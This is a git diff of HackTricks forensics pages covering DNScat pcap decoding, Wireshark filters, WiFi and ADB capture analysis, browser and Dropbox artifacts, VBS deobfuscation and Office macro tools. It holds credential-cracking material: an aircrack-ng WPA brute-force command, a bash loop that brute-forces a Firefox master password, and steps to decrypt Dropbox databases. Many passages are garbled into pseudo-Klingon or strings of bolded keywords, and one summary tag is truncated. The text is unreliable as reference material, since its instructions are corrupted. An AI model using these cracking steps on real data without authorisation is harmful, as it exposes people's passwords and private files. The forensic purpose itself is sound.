For more information: [https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap](https://github.com/jrmdev/ctf-writeups/tree/master/bsidessf-2017/dnscap)\
|
||||
[https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md](https://github.com/iagox86/dnscat2/blob/master/doc/protocol.md)
|
||||
|
||||
|
||||
There is a script that works with Python3: [https://github.com/josemlwdf/DNScat-Decoder](https://github.com/josemlwdf/DNScat-Decoder)
|
||||
|
||||
```
|
||||
python3 dnscat_decoder.py sample.pcap bad_domain
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -61,5 +55,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -41,5 +39,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -26,16 +24,12 @@ When you receive a capture whose principal traffic is Wifi using WireShark you c
|
|||
## Brute Force
|
||||
|
||||
One of the columns of that screen indicates if **any authentication was found inside the pcap**. If that is the case you can try to Brute force it using `aircrack-ng`:
|
||||
|
||||
```bash
|
||||
aircrack-ng -w pwds-file.txt -b <BSSID> file.pcap
|
||||
```
|
||||
|
||||
For example it will retrieve the WPA passphrase protecting a PSK (pre shared-key), that will be required to decrypt the trafic later.
|
||||
|
||||
# Data in Beacons / Side Channel
|
||||
|
||||
If you suspect that **data is being leaked inside beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains <NAMEofNETWORK>`, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
|
||||
**beacons of a Wifi network** you can check the beacons of the network using a filter like the following one: `wlan contains <NAMEofNETWORK>`, or `wlan.ssid == "NAMEofNETWORK"` search inside the filtered packets for suspicious strings.
|
||||
|
||||
# Find Unknown MAC Addresses in A Wifi Network
|
||||
|
||||
|
@ -70,5 +64,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -77,11 +77,11 @@ Here you can find wireshark filter depending on the protocol: [https://www.wires
|
|||
Other interesting filters:
|
||||
|
||||
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
|
||||
* HTTP and initial HTTPS traffic
|
||||
* HTTP and initial HTTPS traffic
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
|
||||
* HTTP and initial HTTPS traffic + TCP SYN
|
||||
* HTTP and initial HTTPS traffic + TCP SYN
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
|
||||
* HTTP and initial HTTPS traffic + TCP SYN + DNS requests
|
||||
* HTTP and initial HTTPS traffic + TCP SYN + DNS requests
|
||||
|
||||
### Search
|
||||
|
||||
|
@ -140,34 +140,32 @@ To import this in wireshark go to \_edit > preference > protocol > ssl > and imp
|
|||
## ADB communication
|
||||
|
||||
Extract an APK from an ADB communication where the APK was sent:
|
||||
|
||||
```python
|
||||
from scapy.all import *
|
||||
|
||||
pcap = rdpcap("final2.pcapng")
|
||||
|
||||
def rm_data(data):
|
||||
splitted = data.split(b"DATA")
|
||||
if len(splitted) == 1:
|
||||
return data
|
||||
else:
|
||||
return splitted[0]+splitted[1][4:]
|
||||
splitted = data.split(b"DATA")
|
||||
if len(splitted) == 1:
|
||||
return data
|
||||
else:
|
||||
return splitted[0]+splitted[1][4:]
|
||||
|
||||
all_bytes = b""
|
||||
for pkt in pcap:
|
||||
if Raw in pkt:
|
||||
a = pkt[Raw]
|
||||
if b"WRTE" == bytes(a)[:4]:
|
||||
all_bytes += rm_data(bytes(a)[24:])
|
||||
else:
|
||||
all_bytes += rm_data(bytes(a))
|
||||
if Raw in pkt:
|
||||
a = pkt[Raw]
|
||||
if b"WRTE" == bytes(a)[:4]:
|
||||
all_bytes += rm_data(bytes(a)[24:])
|
||||
else:
|
||||
all_bytes += rm_data(bytes(a))
|
||||
print(all_bytes)
|
||||
|
||||
f = open('all_bytes.data', 'w+b')
|
||||
f.write(all_bytes)
|
||||
f.close()
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -1,16 +1,14 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
lo'laHbe'chugh HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* vaj **company HackTricks advertise** **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* **official PEASS & HackTricks swag** [**ghItlh**](https://peass.creator-spring.com)
|
||||
* **The PEASS Family** [**ghItlh**](https://opensea.io/collection/the-peass-family), **collection NFTs** [**ghItlh**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) **HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -41,16 +39,14 @@ Here you can find interesting tricks for specific file-types and/or software:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
lo'laHbe'chugh HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* vaj **company HackTricks advertise** **download HackTricks PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* **official PEASS & HackTricks swag** [**ghItlh**](https://peass.creator-spring.com)
|
||||
* **The PEASS Family** [**ghItlh**](https://opensea.io/collection/the-peass-family), **collection NFTs** [**ghItlh**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **telegram group**](https://t.me/peass) **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) **HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -55,7 +55,7 @@ A `profiles.ini` file within these directories lists the user profiles. Each pro
|
|||
Within each profile folder, you can find several important files:
|
||||
|
||||
- **places.sqlite**: Stores history, bookmarks, and downloads. Tools like [BrowsingHistoryView](https://www.nirsoft.net/utils/browsing_history_view.html) on Windows can access the history data.
|
||||
- Use specific SQL queries to extract history and downloads information.
|
||||
- Use specific SQL queries to extract history and downloads information.
|
||||
- **bookmarkbackups**: Contains backups of bookmarks.
|
||||
- **formhistory.sqlite**: Stores web form data.
|
||||
- **handlers.json**: Manages protocol handlers.
|
||||
|
@ -83,8 +83,8 @@ With the following script and call you can specify a password file to brute forc
|
|||
#./brute.sh top-passwords.txt 2>/dev/null | grep -A2 -B2 "chrome:"
|
||||
passfile=$1
|
||||
while read pass; do
|
||||
echo "Trying $pass"
|
||||
echo "$pass" | python firefox_decrypt.py
|
||||
echo "Trying $pass"
|
||||
echo "$pass" | python firefox_decrypt.py
|
||||
done < $passfile
|
||||
```
|
||||
{% endcode %}
|
||||
|
@ -192,11 +192,7 @@ Get Access Today:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
|
|
|
@ -1,8 +1,6 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vaj zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -18,55 +16,61 @@ Other ways to support HackTricks:
|
|||
Some things that could be useful to debug/deobfuscate a malicious VBS file:
|
||||
|
||||
## echo
|
||||
|
||||
```bash
|
||||
Wscript.Echo "Like this?"
|
||||
```
|
||||
## Comments
|
||||
|
||||
## Commnets
|
||||
### tlhIngan Hol
|
||||
|
||||
## Qapla'! Qapla'!
|
||||
|
||||
### tlhIngan Hol
|
||||
|
||||
## Qapla'! Qapla'!
|
||||
```bash
|
||||
' this is a comment
|
||||
```
|
||||
|
||||
## Test
|
||||
|
||||
```bash
|
||||
cscript.exe file.vbs
|
||||
```
|
||||
|
||||
## Write data to a file
|
||||
|
||||
## tlhIngan Hol translation:
|
||||
|
||||
## Datuv vItlhutlh
|
||||
|
||||
## HTML translation:
|
||||
|
||||
## <h2>Datuv vItlhutlh</h2>
|
||||
```js
|
||||
Function writeBinary(strBinary, strPath)
|
||||
|
||||
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
|
||||
Dim oFSO: Set oFSO = CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
' below lines purpose: checks that write access is possible!
|
||||
Dim oTxtStream
|
||||
' below lines purpose: checks that write access is possible!
|
||||
Dim oTxtStream
|
||||
|
||||
On Error Resume Next
|
||||
Set oTxtStream = oFSO.createTextFile(strPath)
|
||||
On Error Resume Next
|
||||
Set oTxtStream = oFSO.createTextFile(strPath)
|
||||
|
||||
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
|
||||
On Error GoTo 0
|
||||
If Err.number <> 0 Then MsgBox(Err.message) : Exit Function
|
||||
On Error GoTo 0
|
||||
|
||||
Set oTxtStream = Nothing
|
||||
' end check of write access
|
||||
Set oTxtStream = Nothing
|
||||
' end check of write access
|
||||
|
||||
With oFSO.createTextFile(strPath)
|
||||
.Write(strBinary)
|
||||
.Close
|
||||
End With
|
||||
With oFSO.createTextFile(strPath)
|
||||
.Write(strBinary)
|
||||
.Close
|
||||
End With
|
||||
|
||||
End Function
|
||||
```
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>qaStaHvIS AWS hacking vItlhutlh</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -77,5 +81,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>!HackTricks</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
|
@ -87,12 +87,10 @@ Then you can use the tool [**DataProtectionDecryptor**](https://nirsoft.net/util
|
|||
If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
|
||||
|
||||
The resulting hex is the final key used to encrypt the databases which can be decrypted with:
|
||||
|
||||
```bash
|
||||
sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
|
||||
```
|
||||
|
||||
The **`config.dbx`** database contains:
|
||||
**`config.dbx`** database contains:
|
||||
|
||||
* **Email**: The email of the user
|
||||
* **usernamedisplayname**: The name of the user
|
||||
|
@ -100,7 +98,7 @@ The **`config.dbx`** database contains:
|
|||
* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
|
||||
* **Root\_ns**: User identifier
|
||||
|
||||
The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
|
||||
**`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
|
||||
|
||||
* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client).
|
||||
* **local\_sjid**: Version of the file
|
||||
|
|
|
@ -33,17 +33,14 @@ To explore OOXML file structures, the command to unzip a document and the output
|
|||
For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables.
|
||||
|
||||
Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`.
|
||||
|
||||
```bash
|
||||
sudo pip3 install -U oletools
|
||||
olevba -c /path/to/document #Extract macros
|
||||
```
|
||||
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) **vIghoS** **automate workflows** **Duj** **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -33,5 +31,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,5 +1,3 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
@ -41,5 +39,3 @@ Other ways to support HackTricks:
|
|||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -2,15 +2,15 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>qa'vIn AWS hacking jatlhlaH</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks poH:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricks advertisement** **company advertise** **want** **pdf HackTricks download** **SUBSCRIPTION PLANS** [**Check**](https://github.com/sponsors/carlospolop)!
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, [**NFTs**](https://opensea.io/collection/the-peass-family) **collection** **exclusive** **our**
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **Join** or [**telegram group**](https://t.me/peass) **or** **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **hacking tricks** **your** **Share** **submitting PRs** [**HackTricks**](https://github.com/carlospolop/hacktricks) **and** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos**.
|
||||
|
||||
</details>
|
||||
|
||||
|
@ -31,14 +31,14 @@ It's crucial to note that password-protected zip files **do not encrypt filename
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>qa'vIn AWS hacking jatlhlaH</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
HackTricks poH:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **HackTricks advertisement** **company advertise** **want** **pdf HackTricks download** **SUBSCRIPTION PLANS** [**Check**](https://github.com/sponsors/carlospolop)!
|
||||
* [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Get**
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) **Discover**, [**NFTs**](https://opensea.io/collection/the-peass-family) **collection** **exclusive** **our**
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) **Join** or [**telegram group**](https://t.me/peass) **or** **follow** **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **hacking tricks** **your** **Share** **submitting PRs** [**HackTricks**](https://github.com/carlospolop/hacktricks) **and** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github repos**.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -47,80 +47,72 @@ When a file is deleted in this folder 2 specific files are created:
|
|||
![](<../../../.gitbook/assets/image (486).png>)
|
||||
|
||||
Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
|
||||
|
||||
```
|
||||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
|
||||
|
||||
### Volume Shadow Copies
|
||||
### tlhIngan Hol
|
||||
|
||||
Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.
|
||||
Shadow Copy Microsoft Windows Daq **backup copies** qorDu'vo' 'ej **snapshots** cha'loghDaq, 'ach 'oH vaj **volumes** Daq, 'ach 'oH **in use**.
|
||||
|
||||
These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
|
||||
**UIDs** **image** vItlhutlh:
|
||||
|
||||
![](<../../../.gitbook/assets/image (520).png>)
|
||||
|
||||
Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
|
||||
**ArsenalImageMounter** **forensics image** **mount** Daq, **ShadowCopyView** [**tool**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) **inspect** **shadow copy** **extract the files** **shadow copy backups**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (521).png>)
|
||||
|
||||
The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
|
||||
`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` **registry entry** **files** **keys** **backup** **contain**:
|
||||
|
||||
![](<../../../.gitbook/assets/image (522).png>)
|
||||
|
||||
The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
|
||||
`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` **registry** **configuration information** **Volume Shadow Copies**.
|
||||
|
||||
### Office AutoSaved Files
|
||||
|
||||
You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
|
||||
`C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\` **office autosaved files** **find**.
|
||||
|
||||
## Shell Items
|
||||
|
||||
A shell item is an item that contains information about how to access another file.
|
||||
**shell item** **item** **information** **access another file**.
|
||||
|
||||
### Recent Documents (LNK)
|
||||
|
||||
Windows **automatically** **creates** these **shortcuts** when the user **open, uses or creates a file** in:
|
||||
Windows **automatically** **creates** **shortcuts** **user** **open, uses or creates a file** **in**:
|
||||
|
||||
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
|
||||
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
|
||||
|
||||
When a folder is created, a link to the folder, to the parent folder, and the grandparent folder is also created.
|
||||
**folder** **created**, **link** **folder**, **parent folder**, **grandparent folder** **created**.
|
||||
|
||||
These automatically created link files **contain information about the origin** like if it's a **file** **or** a **folder**, **MAC** **times** of that file, **volume information** of where is the file stored and **folder of the target file**. This information can be useful to recover those files in case they were removed.
|
||||
**automatically created link files** **contain information about the origin** **file** **folder**, **MAC** **times** **file**, **volume information** **file stored** **folder** **target file**. **information** **useful** **recover** **files** **case** **removed**.
|
||||
|
||||
Also, the **date created of the link** file is the first **time** the original file was **first** **used** and the **date** **modified** of the link file is the **last** **time** the origin file was used.
|
||||
**date created of the link** **file** **first** **time** **original file** **first** **used** **date** **modified** **link file** **last** **time** **origin file** **used**.
|
||||
|
||||
To inspect these files you can use [**LinkParser**](http://4discovery.com/our-tools/).
|
||||
[**LinkParser**](http://4discovery.com/our-tools/) **inspect** **files**.
|
||||
|
||||
In this tools you will find **2 sets** of timestamps:
|
||||
**2 sets** **timestamps** **find**:
|
||||
|
||||
* **First Set:**
|
||||
